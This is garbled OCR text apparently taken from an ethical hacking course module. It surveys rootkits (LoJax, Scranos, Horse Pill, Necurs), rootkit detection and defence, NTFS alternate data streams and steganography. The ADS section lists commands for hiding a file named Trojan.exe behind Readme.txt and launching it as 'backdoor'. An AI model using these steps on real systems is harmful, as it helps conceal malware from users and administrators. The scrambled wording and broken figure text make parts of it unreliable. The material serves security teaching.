manipulating the list of active processes
of the OS,thereby datainsidethe process
altering
identifierstructures. It can obtain read/write
access to the \Device\Physical
Memory object.It

a
hides processbyunlinking
process
lst.
it fromthe

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Rootkits:LoJax
Popular and Scranos CEH
Lojax Seranos

executed
whenever
expos UEFthat
starts
thesystem up mechanism, andmains command

Popular
Rootkits: Horse Pill and Necurs
HorsePal Necurs

Popular
Rootkits

Theare
some
of popular
following
=
rootkits
Lolax
the most

Source:https://www.welivesecurity.com
typeof UEFIrootkitthat is widely
Lolax is a usedbyattackersto perform
cyber-attacks.
Lolax is createdto injectmalwareinto the systemand is automatically
executed

ical andCountermensores
Mackin ©by E-Comel
Copyright
whenever starts up. It exploits
the system whichacts as an interface
UEFI, betweenthe
OSandthe firmware.It is extremely
challenging
to detectLolaxas it evadestraditional
controls
security andmaintains its persistence
even afterOSreinstallationor harddisk
replacement.
Lolax uses a collectionof tools to access and modify
the system’s
UEFI/BIOS
settings.
The
©
functions
performed
Collect
save
all settings
and
file
bythesetoolsincludethe following:
the system in a text
© Accessthe contents of the system’s
SerialPeripheral Interface(SPI)
memory that

a
contains UEFI/BIOS locationandsave it as a firmware
Embeda maliciousUEFImodule(rootkit)
image
into the firmwareimageandthensave the
firmwareimagei n the SPIflashmemory

83d06944
cddeBde
EStlStaokios
soy
eve
wee
C7é2
DSBS
bIbS
b5bS
6.118:
Figure
toe
Secoensho.t
ofLolox
eee

6.119:Secoenshot2
Figure ofLolo
Scranos
Source:https://www.bitdefender.com
Scranosis a trojanized rootkit that masquerades as crackedsoftwareor a legitimate
suchas anti-malware,
application, a videoplayer,or an ebook reader, to infectsystems
and perform data exfiltrationthat damages the reputation of the targetand steals
intellectualproperty.When thisrootkitexecuted, a rootkit driveris automatically
installed,
whichthen starts installingothermalicious components into the system. Apart
frominstallingmalicious components, Scranosalsointeracts with various websites on

Theoperations
of
the behalf the victim,
performed
bythe Scranos
dropper
androotkit are as follows:
The dropper stealscritical informationsuch as logincredentials,
cookies,
and
paymentinformationusingspecialized DLLsandsendsbackthedata to a command
andcontrol(C&C)server.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 installsa rootkitinto thesystem,
Thedropper
Therootkit registers a shutdowncallbackto achievepersistence. At shutdown,
the
driveris written to disk, service key
and a start-up is createdi n the registry.

Therootkitinjects
a downloader
into an svchost.exe
process.
‘The
downloadersendssome informationaboutthe system
to the C&Candreceives

download
links.
Payloadsare downloaded
andexecuted automatically,

6.121:
Figure Sezeenshot2ofSeranos

6
Module 742
Page
and ©ical Mackin Countermensores
Copyright
by E-Comel
 HorsePill
Source:http://www.pill.horse
a proof
HorsePill is of concept of a ramdisk-based containerizing rootkit. It resides
inside“initrd,―
andbeforetheactualinit starts running,it putsit into a mount andPID
namespacethat allowsit to run covert processesand storage.Thisalsoallowsit to run
covert networking
systems, suchas DNStunnels,

rootegtf

Figure 6.123:
Sereenshot2
ofHorse
Pllootkit
It hasthreeimportant
movingparts,whichare as follows
©. klibe-horsepill.patch.
Thisis a patch to klibethat provides whichon modernUbuntusystems
run-init, runs
the real init, systemd. This patches in the rootkitfunctionality
and creates a
maliciousrun-init. Thisbinary hasa new section calledthe DNSCMDLINE, which
provides command-line optionsto dnscatbundledwithinthe patch.
horsepill_setopt
This scripttakes i n command-linearguments
and puts them into the section
mentioned
above.
horsepill_infect
Thistakesthe file to splatover run-init while assembling
ramdisksa s a command-
line argument. It then callsupdate-initramfs and splats
over the run-init as the
ramdisksare being assembled.

6
Module 742
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 Necurs
Source:httpsi//www.f-secure.com
Necursis a kernel-modedrivercomponent that can beusedbyan attacker(oraddedas
a component to anothermalicious program)to performunauthorizedactions to take
controlof an OS, without alerting
the system’s mechanisms.
security Necurscontains
backdoorfunctionality,whichallows remote access andcontrolof the infected
computer. and filtering
It alsoallowsthe monitoring of networkactivityand hasbeen
observedto sendspam and install rogue security software.It enablesfurther
byproviding
compromise the functionality
to do the following
9

0
Download
additional
malware

Hideapplicationsfunctioning
its components
©. Stopsecurity from

DUORD
DUORD Key
DUORDKey:
DUORDCndBut for

Figure6.124
Sereenshotd
ofNecursroctit

eax, [ebpeCrdBuFFerLength]
eax 3 OUT_BufLen
obs, [enprenamuereey,
eax OUT_ouF
3

9CAIELO8H 3 Skey2
OnFER9910N 3 Skeyt
biecurs_CrdSearcha

Figure 6.125: of Necursroot

Sereenshot2

6
Module 744
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 A
CT
/ts/Nost.
WypertertTransferProtocol
post asp HTTP/A;2\P\N
TO

don
Fengths190)

Sereenshot3
Figure 6.126: ofNecurs
rootkit
Someexamples
ofpopular
rootkitsare listedas follows:
=
Azazel
+
Sirefet
=
Wingbird
Rootkit
Avatar

GrayFish
ZeroAccess

Module
6 745
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 Rootkits
Detecting

runtime oeciton
istecniquecompores pth of and erecta
alate processes es befor ond

Rootkits
Detecting
We haveseen howattackersemploy various rootkitsto hidefilesandtheir presence on the
targetsystem. Now, let us discussvarious rootkit detectionmethodsfrom a security
In general,
perspective. rootkit detectiontechniques can be categorized
into signature-based,
integrity-based,
heuristic-based, andruntimeexecution path
cross-view-based, profiling,
‘=
Integrity-Based
Detection
Integrity-based
detectioncan be regarded
as a substitutefor both signature-based
and
detection.Initially,
heuristic-based the user runs toolssuchas Tripware and AIDEon a
cleansystem. Thesetools create a baselineof cleansystemfilesand store them in a
database.Integrity-based
detectionfunctionsbycomparinga current filesystem, boot
records,or memorysnapshot with that trustedbaseline. They detectthe evidenceor
presenceof malicious
activitybasedon dissimilaritiesbetweenthe current andbaseline
snapshots.
Signature-Based
Detection
Signature-based
detectionmethodswork as rootkit fingerprints.
Theycompare the
characteristics
of all systemprocesses
andexecutable
fileswith a database
of known
rootkit fingerprints. It can comparea sequence of bytesfrom a file with another
sequence of bytes that belong program.Themethodmostly
to a malicious scanssystem
files.It can easilydetectinvisiblerootkitsbyscanningthe kernelmemory.Thesuccessof
signature-based tendency
detectionis lower owing to the rootkit’s to hide files by
interrupting the execution pathof the detectionsoftware.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Heuristic/Behavior-Based
Detection
Heuristic-baseddetectionworks byidentifying deviationsin normalOSpatternsor
behaviors.This typeof detection is also known as behavioraldetection.Heuristic
detectioncan identify
new, previouslyunidentifiedrootkitsbyrecognizingdeviantsin
“normal―
systempatterns Executionpath
or behaviors. hooking is one suchdeviantthat
helpsheuristic-based rootkits
detectorsidentify
RuntimeExecutionPathProfiling
The runtime execution pathprofiling technique comparesruntime execution path
profiling
ofall systemprocesses andexecutable files.Therootkit addsa new codenear
execution pathto destabilizeit. Themethodhooksseveralinstructions
to a routine’s
executed beforeandaftera certain routine,as thesecan besignificantlydifferent,
Cross-View-Based Detection
Cross-view-based detectiontechniques functionbyassumingthat the OShasbeen, in a
way, subverted. Thistechnique enumerates the systemfiles,processes, and registry
keysbycalling c ommon APIs.The tools comparethe gathered informationwith the
datasetobtainedusingan algorithm to traversethrough
the same data.This detection
technique relieson the fact that the API hookingor manipulation of the kerneldata
structure causes the data returned bythe OS APls to be tainted with low-level
mechanisms used to output the same information free from DKOMor hook
manipulation,
Alternative
TrustedMedium
The alternativetrusted mediumtechnique
is the most reliable methodused for
detecting
rootkitsat the OSlevel.In this technique,
the infectedsystem
is shutdown
andthen bootedfromalternativetrustedmedia, suchas a bootableCD-ROMor USB
flashdrive.After booting,
the OSstorage is checked to find traces of the rootkit,
which
can furtherberemoved, to restore the system to its normal state.
Analyzing Memory Dumps
In memory dumpanalysis, the volatile memory (RAM) of the suspected systemis
dumped andanalyzed to detecttherootkiti n the system.
Using thistechnique, one can
create a static snapshot of a singleprocess,systemkernel, or the entire system. To
detect a rootkit,the entire system memoryis dumped to analyze and captureactive
rootkits.Thismemorydumpcan further be usedto perform offline forensicanalysis.
Creating memorydumps mayrequire specialized hardware.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 for Detecting
Steps Rootkits

Run "diz
Infected
/2 /b /ah*and "dix /s /b /a-b" side
5 andsave theresus te potently

SootCD,ntoa dean fun “dix /= /

thesame diveandsave theresults
‘on
/ad"and“dix
/2 > /a-b

Step
‘Run
nts version
lerhiingghostware
(i.e, of
of WinMerge
to
invisible
inside,
wise
from
ouside)
on thetw sate results detect
6 but the

for Detecting
Steps Rootkits
Thereare many tools availableon the marketthat can be usedto detectthe presence of
rootkitson a targetsystem. However,sometimes, toolsare inadequate as themalware writers
always find waysto counter theseautomatedrootkit detectors,andsome of theirlatestefforts
are even ableto evadethem. Therefore, it is better to manually detecta rootkit.Manual

Manually
of
detection rootkitsrequirestime, patience,
examine the filesystem
perseverance, expertise.
andregistry
of the system
and
to detectrootkits.

Steps to detectrootkitsbyexamining
the filesystem
are as follows.

Run"dix /s /b /ah"and"dir /s /b /a-h" insidethepotentially

infected
OS
andsave the results.

drive,
and asave
Boot into cleanCD,
run "dix /s
theobtainedresults.
/b /ah―
and"dir /s /b /a-h" onthe same

Runthe latestversion of the WinMerge

tool o n the two setsof resultsto detectfile-
hiding
‘Steps
ghostware
but
(i..,invisibleinside, visiblefromtheoutside)
to detectrootkitsbyexaminingtheregistry a re as follows.
1. Runregedit.exe
frominsidethe potentially
infectedOS.
HKEY_LOCAL_MACHINE\SOFTWARE
2. Export and HKEY_LOCAL_MACHINE\SYSTEM
hivesi n text fileformat.
Bootinto a cleanCD(such
as WinPE)
Runregedit.exe.
Create a new suchas HKEY_LOCAL_MACHINE\Temp.
key,
38 tical andCountermensores
Making by Comet
Copyright©
 6. Loadthe registryhivesnamedSoftware fromthe suspectOS.The
and System
default location willbe —_¢:\windows\system32\config\software
and
:\windows\system32\config\system.
Export hivesi n text file format.(The
theseregistry hivesare storedin binary
registry
6 and7 convert the filesto text.)
formatandSteps
Launch
the WinMerge
toolfromthe CDandcomparethe two sets of resultsto
detectfile-hiding
malware(i.e,invisibleinside,
butvisiblefromthe outside).
Note: Therecan be some falsepositives.In addition,
thisdoesnot detectstealthsoftwarethat
hidesi n BIOS, baddisksectors,alternatedatastreams(ADSS),
videocardEEPROM, etc.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to Defendagainst
Rootkits
CEH
mages, peasant

‘eet
egy
vert
von
rotrmsety toptem
ta
h eree ening
Farin cmos

opty
update
tru an antsy

‘cae not
downlod
oy
om ergs

How to Defendagainst
Rootkits
A common featureof theserootkitsis that the attackerrequires administratoraccess to the
targetsystem. Theinitialattackthatleadsto thisaccessis oftennoisy.Therefore, one should
monitor the excess networktrafficthat arises i n the faceof a new exploit. It is obviousthat log
analysisis a n importantcomponent of riskmanagement. The attacker may haveshellscripts or
toolsthat can helphim/her cover his/her tracks, but therewill almostcertainly beothertelltale
signs
A
that can leadto proactivecountermeasures, not justthe reactive ones.
data,excluding
reactive countermeasure is to backup allcritical the binaries,and performa

violationswhenchanges
a
fresh,cleaninstallationfrom trusted source. Onecan perform
defenseagainsttools like rootkits.MDSsum.execan fingerprint
occur. Todefendagainst rootkits,
codechecksumming
filesand note integrity
integritycheckingprogramsshould
as
agood
beusedfor criticalsystem files.

Afewtechniques
=
adopted
to defend
against
ReinstallOS/applications
rootkitsare as follows.
froma trustedsource after backingup criticaldata
+
automatedinstallationprocedures
Maintainwell-documented
Perform analysis
kernelmemory dump to determinethe presenceof rootkits
‘=

=
the server
against
attack
Harden workstation or the
anyfiles/programs
Educatestaffnot to download fromuntrustedsources
firewallsandfrequently
Installnetwork-andhost-based checkfor updates
Ensurethe availability
of trustedrestoration media
andpatch
Update applications,
OSs, andfirmware

Module
6 750
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Regularly
verifythe integrityof systemfiles using cryptographically
strongdigital
fingerprint
technologies
Regularly
updateantivirus andanti-spyware
software
Keep anti-malwaresignaturesup to date
Avoid logging privileges
into an account with administrative
to the leastprivilege
‘Adhere principle
Ensurethatthe chosenantivirus softwarepossessesrootkit protection
Do not installunnecessary applications,anddisable thefeatures andservices not i n use
Refrain fromengagingin dangerous activities on the Internet
Closeanyunusedports
Periodically
scan the localsystem using host-based security scanners

Increasethe securityof the system usingtwo-step multi-step

or authentication,so that
an attackerwill not gainroot accessto the system to installrootkits
Neverread emails,browsewebsites, or open documentswhile handling an active
sessionwith a remote server
Use configuration and vulnerability-scanning
management tools to verify
effective
deployment
of updates

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Anti-Rootkits

awarebtes
An Rete

Anti-Rootkits
Thefollowinganti-rootkitscan be usedto remove various typesof malware,
suchas rootkits,
Trojans,
viruses, and worms, fromthe system. You can downloador purchaseanti-rootkit
from malware,
softwarefromtheir websitesand installthem on your PCto gain protection
especially
fromrootkits.
=
GMER
Source:http://www.gmer.net
GMERis an application
that helps professionals
security to detectand remove rootkits
byscanningprocesses,threads,modules,services, files,disksectors (MBR), ADSs,
keys,
registry driverhookingSSDT,
~

IDT,andIRPcalls,andinlinehooks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
A fewmore
Figure6.127:
Screenshot
ofantiraotkt
anti-rootkitsare listedas follows.
important
G
Stinger(https://www.mcafee.com)
Avast FreeAntivirus (https://www.avast.com)

(https://usa.kaspersky.com)
TDsSkiller
MalwarebytesAnti-Rootkit(https://www.malwarebytes.com)
RootkitBuster(http://www.trendmicro.co.in)

Module
6 752
Page tical MakingandCountermensores
by Comet
Copyright©
 NTFSData Stream

ie le,
[NFSAlternateDatastream can forkdatainto
‘ApS AS allowsan atacer to
(05) 3 Windows
hidden iting files ith Injectmalicious
codei n
forthe sucha¢
‘metadata functionality a ndexecutethem

detected
se, or system
Sttnbtes,wordcount,author delayofl browsing withoutBeing by

‘madieation
tine ofthe
l es

NTFSDataStream
NTFSis a filesystem that stores a file with the helpof two data streams,
calledNTFSdata
streams,along withthefileattributes. Thefirstdatastreamstoresthesecurity descriptorfor
thefile to be stored,
suchas permissions, andthesecondstores thedatawithin a file.ADSsa re
another typeof nameddatastreamthat can bepresent eachfile.
within
=<
oo

6.128:N TES data streams

Figure
AnADSrefers

theirphysical
to anytypeof dataattached

locations on thedisk.Therefore,
aof
to file,but not in the fileon an NTFS

ADSs
system.
in thefilebutattached
a re not present
The
master file tableof the partitioncontains a list all the data streams that a file contains and
to it
through the file table. NTFSADSis a Windowshiddenstream that contains metadatafor the
file,suchas attributes, wordcount,authorname, and accessand modification times of the

ical andCountermensores
Mackin ©by E-Comel
Copyright
ADSsc an forkdata into existingfileswithoutchanging or alteringtheirfunctionality,size, or
displayto file-browsing
utilities.Theyallowan attackerto injectmaliciouscodeinto fileson an
accessible systemand execute them withoutbeingdetectedbythe user. ADSsprovide
attackerswith a methodof hiding rootkitsor hackertools on a breachedsystem andallow a
Userto execute themwhilehiding fromthesystem
administrator,
Wacker
command
=
EM
cotchemuningse

Fileswith ADSare impossible

line or Windows
the original
Figure
le
existing
6.129Hiding
filesusing
NTFS
datastreams
to detect using native file-browsing
Explorer.
file does not change.
modificationtimestamp,
Afteran ADSfileis attached
—â
techniques
to theoriginal
i
T ES Fle System

suchas the
file,thesize of.
The onlyindicationthat the file was changed
whichcan be innocuous.
is the

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to CreateNTFSStreams
is stream compliant
Notepad application
launch: \pnatepadmyfite.txt:1on. txt

launch: \>notepadmyfite. ext: tiger ext

View
fies#529.
tx er)
the of my shouldbe

or
Toview
the
motte steamdts hidden

notepadayite.ext:eiger. Oe
instep 1 nue following resect
commands

How to CreateNTFSStreams
Using NTFS datastreams,an attackerc an almostcompletely hidefileswithin a system.
Itis easy
to use thestreams,butthe user can only identify
it withspecific software. Explorer
can display
onlythe root files;it cannot view the streamslinkedto the root filesandcannot definethe disk
security by As implants
itself
spaceused the streams. such,if a virus
softwarewill identify i.
into ADS, itis unlikely
thatstandard

Whenthe user readsor writes a file,i t manipulates

the main datastream bydefault.
We now explorehow to create an ADS for a file. ADSs follow the syntax:
“filename.ext:alternateName―,
Steps
to create NTFS
Streams:
1. Launchc:\>notepadmyfile. txt: Lion. txt to create the new file,
andclick‘Yes’

some
data,
enter

LaunchSave
the
¢:\>notepad
and file
myfile. txt: tiger. txt to create the new file,
andclick‘Yes’
some
data,
enter
Save
the zero}
myfite..
and
Viewthe filesize of
file
txt (Itshouldbe
Thefollowing
commands
can beusedto view or modify
stream datahiddeni n steps1
and2,respectively:
notepadmyfile. txt: Lion. txt
notepadmyfile. txt: tiger. txt
Note: Notepad stream-compliant
is a application.
You shouldnot use alternatestreamsto store
criticalinformation.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 NTFSStreamManipulation

‘inn
nee) esa 0)

Tomovethecontentsof Tojan.oxe (trem):

to Readme.tat

Ci\>typeef \trojan.ene > c!\Raadne.ext: Teojan.ee

Tocreate linktotheTrojan.exe
stream
insidetheReadme.fle

Peete tseneenite nett ean

B] cs\obackdoor

NTFSStreamManipulation
Youcan manipulate
NTFSstreams to hide a maliciousfile i n other files,suchas text files,by
doing
the following:
Hiding Trojan.exe (malicious
program) in Readme.txt (stream):
Usethe following commandto move the contents Trojan.exe
c:\>type c:\Trojan.exe>c:\Readme.
of
txt: Trojan.exe
(stream):
to Readme.txt

The“type―
commandhidesa file in an alternatedata stream (ADS) behindan existing
file.Thecolon(:)
operator
givesthe command

of
to create or use ADS.
stovethecontents
Location, to Readme.txt
Trojan.exe
q Location
Tojan.exe
(size:
2MB) Readme.tt (size:
0)

Creatinga linkto the Trojan.exe stream inside

theReadme.trt file:
After hidingthe file Trojan.exebehindthe Readme.txt file,you needto create a link to
launchthe Trojan.exe file fromthe stream. Thiscreates a shortcut for Trojan.exe
i n the
stream.
C:\omklink backdoor.exe Reade. txt: Trojan.exe

ical andCountermensores
Mackin ©by E-Comel
Copyright
 theTrojan:
Executing
C:
Type \>backdoorto run the Trojan
the backdoor
is theshortcut
the Trojan.
Here,
that you havehiddenbehindReadme.txt.
createdi n the previous step,which on execution installs

Note: UseNotepad
to readthe hiddenfile.
For example,the command C:\>notepad
sample.
txt:secret.txt creates the secret.txt
stream behindthe sample.tat
file

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to Defendagainst
NTFSStreams

filestotheFATparton
move thesuspected
T odeleteNIFSstreams,

Usethird-partyfl inter
checker
suchas to FileIntegrity
Tripwire theinterty
Managermaintain

such
Useprograms
ADS
ae SteamDetector,LADS,
or Detectorto detect
streams

[Enable
real-time
antivirusseaning theexecution of maicous
to protetagainst streams i n yoursstem

Use
uptodate
antivius
on software yoursytem

How to Defend against

NTFSStreams
You shoulddothe following
to defendagainst
malicious NTFSstreams:

*
Todeletehidden
partition NTFS streams,m ove the suspected
filesto
a file allocationtable (FAT)

Use a third-party
file integritychecker
suchas Tripwire
File Integrity
Manager
to
maintain the integrity
of NTFSpartition
filesagainst
unauthorized
ADSs.
Usethird-party
utilities to showand manipulate
hiddenstreams suchas EventSentry
SysAdmin
Tools
or
or adslist.exe,

Avoidwritingimportant critical datato ADSs.

Useup-to-date
antivirus softwareon your system.
Enablerealtime antivirus scanning to protectagainstthe execution of malicious
streamsin your system.
Use file-monitoring
softwaresuchas Stream Detector (https://www.novirusthanks.org)
andGMER(http://www.gmer.net)
to helpdetectthe creation of additionalor new data
streams.
You should use LADS(https://www.aldeid.com) software as a countermeasure for NTFS
streams.Thelatestversion of lads.exe andit reportsthe existenceof ADSS.It
i s GUI-based,
searchesfor either single
or multiple
streams,reportsthe presence of ADSs,
and provides
the
full path
Other
of found.
andlengtheach ADS
includecopyingthe cover file to a FAT partition
means andthen movingit backto the
NTFS.WhereFATfilesystems do not supportADSS, thiswill effectively
remove themfromthe
original
file.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 NTFSStreamDetectors

Armor
| (0)
andhidden
cleane
StreamArmordiscovers
stresme
AerateOata
ompetely
tem

NTFSStreamDetectors
Therearevarious NTFSstream detectorsavailableon the market.You can detectsuspicious
streamswiththe following
NTFSstreamdetectors. Youcan download andinstallthesestream
detectorsfromtheirwebsites.
Stream Armor
Source:https://securityxploded.com
StreamArmoris a tool usedto discover
hiddenADSsandcleanthemcompletely from
Its advancedauto analysis,
your system. coupledwith a n online threat verification
mechanism,helpsyoueradicateanyADSs that maybepresent,
shownin the screenshot,
‘As professionals
security use StreamArmorto analyze
and
detectADSstreamsi n their systems.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 igegegeaexamples
additional
6.131:
Figure
Steam
Armor
Secoenshot
stream detectors
of NTFS
of
are listedas follows:
StreamDetector(https://www.novirusthanks.org)
GMER(http://www.gmer.net)
(https://dmitrybrant.com)
Manager
‘ADS
Scanner(https://www.pointstone.com)
[ADS
(https://docs.microsoft.com)
Streams

6
Module 761
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 What is Steganography?
ea
estination a
manta
anography hidingsecret
technaueof
conidentayaata
withinan
message
ordinary
mesagead extractingatthe

a
Lutninggrphlclmage
acover ithe mos popular
method
to conceal
the dt In fle

ANN

Whatis Steganography?
Oneof the shortcomings of various detectionprograms is their primary focuson streaming text
data.Whatif an attackerbypasses normalsurveillance techniques andstillstealsor transmits
sensitive data? In a typical situation,after an attackermanagesto infiltrate a firm as a
‘temporaryor contractemployee, he/she surreptitiouslyseeksout sensitive information.
While
the organization
facility,
mayhavea policy
a determined
steganography.
that doesnot allowremovableelectronicequipment the
attackercan stil find waysto circumvent this byusingtechniques suchas. in
Steganography
refersto the art of hiding other datawithout the knowledge
data“behind― of
the victim. Thus,steganography hidesthe existence of a message. bits of unused
It replaces
datainto ordinaryfiles,suchas graphics,
sound, text, audio,
andvideowith other surreptitious
or ciphertext,
bits.Thehiddendata can be i n the form of plaintext and sometimes,an image.
Utilizing
@graphicimageas a cover is the most popular methodto concealthe data in files.
the detectionof steganography
Unlike encryption, can be challenging.
Thus,steganography
Forexample,
are malicious
techniqueswidely
purposes.
usedfor
attackerscan hide keylogger insidea legitimate image; thus, whenthe victim
clicks
Attackers
the
o n the image,the keylogger
alsouse steganography
capturesvictim’s
to hideinformation
keystrokes.
whenencryption is not feasible.
In terms
of security, it hidesthe file i n an encrypted format, so that even if the attackerdecrypts it, the
message will remain hidden. Attackerscan insert information suchas source codefora hacking
tool,a list of compromised servers, plans
for future attacks, communication andcoordination
channels,
etc.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Classificationof Steganography

Yin
seqmogrety
WV, Semen @
6 @ —opencotes °

VYstcoher
Wunisengams GY)(W/ c omredeohen >
Y om comer
°

Classificationof Steganography
Basedo n its technique, steganography can beclassifiedinto two areas: technicaland linguistic.
In technicalsteganography, a message is hiddenusingscientific
methods, whereas i n linguistic
steganography, it is hiddeni n a carrier,
whichis the mediumusedto communicate or transfer
messages
key,
or files.Thismedium
of
comprises the hiddenmessage, carrier, and steganography

Thefollowing
diagram
depicts of steganography.
theclassification

Steganography

Semmens
—
@ )£@
—_Opencodes

Vit coher
Vaustsemynm W) (Vf « >
Y caecpner

YP)
esemagems (Y unaene .

ee
Classifiation
Figure 6.133 of steganoaraphy

6
Module 764
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 Steganography
Technical
steganography
Technical usesphysical methods,
or chemical includinginvisibleink,microdots,
andothermeans,to hidethe existence of a message.
Its difficultto categorizeall the methods
bywhichthesegoalsare achieved, but some examplescan belistedas follows:

Invisibleink,or “security is one of the methodsof technicalsteganography.

ink,― It is
usedfor invisiblewritingwith colorless liquidsandcan later bemadevisiblebycertain
pre-negotiated manipulations suchas lightingor heating.
For example, if you use onion
juice andmilkto write a message, thewritingwill beinvisible,
butwhenheat is applied
to the writing, it turns brownandthe messagethereforebecomes visible.
Applications of invisibleink are as follows:
© Espionage
Anti-counterfeiting
© Property
marking
© Handstamping
for venue readmission
© Identificationmarking
i n manufacturing

Microdots
‘A
microdotis a text imageconsiderably
or an condensedin size (withthe helpof @
reverse fittingup to
microscope), one page i n a single dot,to avoid detectionby
unintendedrecipients.Microdotsare usually circularand about one millimeterin
diameterbut can beconvertedinto differentshapes andsizes.
Computer-Based
Methods
computer-based
‘A to digital
method makeschanges carriers to embedinformation
foreign to the native carriers, Communication
of suchinformationoccurs i n the formof
text, binary files,diskandstorage andnetworktrafficandprotocols.
devices, It can alter
software, speech, pictures,videos,
or any other digitally represented code for
transmission
Computer-based
Steganography
Techniques
Basedon the cover modificationsapplied
i n the embedding
process,steganography
techniques
can beclassified
into six groups,whichare as follows:
©Substitution
Techniques: In this technique,the attackertries to encodesecret
Informationbysubstituting the insignificant
bits with the secret message.If the
receiver knowsthe places wherethe attackerembedssecret information, then
he/she can extract the secret message.

TransformDomain Techniques: The transform domain technique hides the

i n significant
information partsof the cover image,suchas cropping,compression,
and some other imageprocessing areas. Thismakesit more difficult to carry out

ical andCountermensores
Mackin ©by E-Comel
Copyright
 attacks.Onecan apply
the transformations
to blocksof imagesor over the entire
image.
Spread Techniques:
Spectrum is lesssusceptible
Thistechnique to interception
and
jamming.In this technique, communication signals occupymore bandwidththan
requiredto sendthe information.Thesenderincreases the bandspreadbymeans of
code(independent of data),andthe receiver usesa synchronized with the
reception
codeto recover theinformationfromthe spread spectrumdata,
Techniques:
Statistical Thistechnique steganography
utilizesthe existenceof "1-bit―
schemes the cover in sucha way that,when transmission of a “1―
bymodifying
change
some of the statisticalcharacteristics
‘occurs, significantly.
In other cases,the
cover remains unchanged, to distinguish
betweenthe modifiedand unmodified
covers. Thetheory of hypothesis statistics helps
frommathematical i n extraction.

Distortion Techniques: In this technique, the user implements a sequence of

modifications to the cover to obtain a stego-object.
Thesequenceof modifications
represents thetransformation of a specific
message. Thedecoding processi n this
technique requiresknowledge aboutthe original
cover. Thereceiver of the message
measure the differences
‘can betweenthe originalcover andthe receivedcover to
reconstruct the sequence of modifications.
CoverGenerationTechniques: In this technique,
digitalobjects
a re developed
specifically
to cover secret communication. Whenthis information i s encoded,
it
ensures the creation of a cover for secretcommunication

Steganography
Linguistic
‘This
steganography
typeof
of linguistic
hidesthe message
steganography
i n the carrier another
includessemagramsandopencodes.
file.Furtherclassification

Semagrams
involvea steganography
‘Semagrams techniquethat hidesinformationwith the help of
signsor symbols. In this technique,
the user embedssome objects or symbols in the
data to change the appearance of the data to a predetermined meaning.The
classification
of sernagrams
is as follows:
©. Visual Semagrams:
Thistechnique
hidesinformationi n 2 drawing, letter,
painting,
music, or a symbol.
Text Semagrams: A text semagramhidesthe text messageby converting or
transforming the appearance of the carrier text message,suchas bychanging
font
sizesandstyles, adding extra spacesa s whitespaces andincluding
i n the document,
differentflourishesi n lettersor handwrittentext.
Open
Codes
Opencode hidesthe secret messagei n a legitimate carrier messagespecifically
designed
in a patternon a documentthat is unclearto the averagereader.Thecarrier
is sometimesalsoknownas the avert communication,
message and the secret message

ical andCountermensores
Mackin ©by E-Comel
Copyright
as the covert communication. The open-code technique
consistsof two main groups:
jargon codesandcoveredciphers.
>
Jargon a certain language
Codes:In this typeof steganography, is usedthat can be
understoodbythe particular to whomit is addressed,
groupof people while being
meaningless
to others.A jargon messageis like a substitutioncipher
i n many
individual letters,the wordsthemselvesare
but insteadof replacing
respects,
‘changed.
An example
of a jargoncodeis “cue―
code.A cue is a wordthat appearsi n
the text andthentransports
the message.
CoveredCiphers:Thistechnique hidesthe message i n a carrier mediumvisibleto
Thistypeof message
‘everyone. can be extractedbyany person with knowledge of
of cover ciphers
the methodused to hide it. Furtherclassification includesnull
ciphers
and
Null
grille
ciphers.
ciphers: A technique
usedto hidethe message within a largeamount of
data are mixedwith the unuseddata i n any order
uselessdata.The original
diagonally,
horizontally, vertically,
or i n reverse so that no one can understandit

than
who
other those knowtheorder.
Grilleciphers: A techniqueusedto encrypt plaintextbywritingit onto a sheetof
paper through a pierced sheetof paper, cardboard,
(orstenciled) or any other
similarmaterial.In this technique, one can decipher the messageusingan
identical grille.This systemis thus difficult to crackand decipher, as only

someone
grille
will
with thecorrect
the
be ableto decipherhiddenmessage.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of Steganography
Types basedon CoverMedium

We
Ehrate sesacerapty Segoerphy

BEd coaiment
strane aphy

Steganography
Folder
spumfEmatSegznorzphy

DVD-ROMsteganography

VideoSteganography

‘ui Steganography
Natural
TextSteganography

0 5Steganography
Hidden

‘Whitespace
Steganography C++Source-Code
Steganography

of Steganography
‘Types basedon CoverMedium
Steganography
is the art and science of writinghiddenmessagesi n sucha way that no one
otherthantheintended knowsoftheexistenceofthemessage.
recipient Theincreasingu se of
electronicfile formats with new technologies has made data hidingpossible. Basic
steganography can be brokendown into two areas: data hiding and documentmaking.
Documentmaking dealswith protection
againstremoval.Its further classifications
of cover
mediumincludewatermarking andfingerprinting.
typesofsteganography
Thedifferent are as follows:
=
ImageSteganography:
Imagesare the most popularcover objectsused for
steganography.
In imagesteganography,
the user hidesthe informationi n imagefilesof
differentformats,
suchas PNG,JPG,
and .BMP.
Documentsteganography: In documentsteganography,
the user addswhitespaces
and
of
tabsat the ends the lines,
FolderSteganography: Folder steganography refersto hiding o ne or more filesi n a
folder.In this process,the user moves the file physicallybut still staysassociatedto its
originalfolderforrecovery.
VideoSteganography: Videosteganography is a techniqueto hide any kind offilewith
any extension i n a carrying videofile. Onecan apply
video steganography
to different
formats
of
files,
such
as .AVI,

Steganography:
‘Audio
.MPG4,
WMV,ete.
In audiosteganography,
the user embedsthe hiddenmessages
ina digital
soundformat.

ical andCountermensores
Mackin ©by E-Comel
Copyright
WhitespaceSteganography:
In whitespacesteganography,the user hidesthe messages
ASCII
in
the
text byadding
whitespaces
Web Steganography:
to the endof lines.
In web steganography,a user hidesweb objects behindother

‘objects
uploads
and
‘Spam/Email
server.
themto a web
Steganography:
Onecan use spam emailsfor secret communication by
